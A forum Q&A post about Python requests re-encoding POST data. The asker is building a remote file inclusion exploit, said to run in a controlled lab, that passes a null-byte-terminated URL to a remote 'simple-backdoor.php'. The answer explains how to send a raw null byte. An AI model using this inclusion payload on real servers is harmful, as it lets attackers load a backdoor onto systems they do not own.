Reputation: 6891
Requests is encoding POST parameters when this is not desired
Note that the following pieces of code are used for a remote file inclusion exploit in a controlled environment (not doing anything malicious here).
I'm trying to perform a post request to a URL:
resp = requests.post("http://example.com/test/index.php",data=post_data,cookies=cookie,proxies=proxies,config={'encode_uri': False})
One of the data parameters is a url which is used for file inclusion, at the end it has a nullbyte:
http://mysite.org/simple-backdoor.php%00
But what requests is doing is re-encoding the nullbyte at the end, making it useless
http%3A%2F%2Fmysite.org%2Fsimple-backdoor.php%2500
I tried appending config={'encode_uri': False}) but this results in the same behavior. Does anyone have a clue how to disable this encoding or how to introduce a nullbyte character which gets encoded to %00?
Upvotes: 3
Views: 542
Answers (1)
Reputation: 475
Requests v2.0.0 onwards doesn't have (thus respect) encode_uri. It tries to encode data if data isn't a string.
Use a unicode null-byte instead of %00, OR manually encode every component of data and form data as a string.
Upvotes: 2
Related Questions
- python requests post returning weird characters
- Python requests POST method unexpected content in response
- python requests module request params encoded url is different with the intended url
- making GET requests with params give different result than encoded url
- Requests POST encoding with python
- python requests post to url query parameter requires special character
- Python Requests Library not encoding dictionary payload properly for post request
- Python and Requests module, correct syntax for 'payload' in url-encoded POST method
- Encoding with requests in python
- Python Requests encoding POST data